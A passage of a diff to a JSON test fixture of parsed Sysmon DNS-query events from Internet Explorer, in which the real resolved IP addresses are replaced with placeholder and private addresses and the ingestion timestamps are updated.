ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19467,11 +19205,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19479,7 +19217,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19487,7 +19225,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19495,7 +19233,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19503,21 +19241,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -19533,22 +19271,22 @@ "ocsp.trust-provider.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313976506Z", + "ingested": "2021-12-09T13:49:44.740032200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19619,11 +19357,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19631,7 +19369,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19639,7 +19377,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19647,7 +19385,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19655,21 +19393,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -19685,22 +19423,22 @@ "ocsp.comodoca4.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313977835Z", + "ingested": "2021-12-09T13:49:44.740038100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19768,52 +19506,52 @@ "type": "CNAME" }, { - "data": "52.4.111.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.205.68.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.28.154", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.225.82.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.213.13.245", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.171.66", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.199.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.57.144", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -19830,21 +19568,14 @@ "sync.crwdcntrl.net" ], "ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313979108Z", + "ingested": "2021-12-09T13:49:44.740043900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19916,11 +19647,11 @@ "type": "CNAME" }, { - "data": "159.127.42.114", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19928,7 +19659,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19936,17 +19667,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -19964,18 +19695,18 @@ "match.sync.ad.cpe.dotomi.com" ], "ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313980421Z", + "ingested": "2021-12-09T13:49:44.740049700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -20050,12 +19781,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -20072,13 +19803,13 @@ "tps10230.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313981737Z", + "ingested": "2021-12-09T13:49:44.740055500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20153,12 +19884,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -20175,13 +19906,13 @@ "tps10221.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313983101Z", + "ingested": "2021-12-09T13:49:44.740061500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 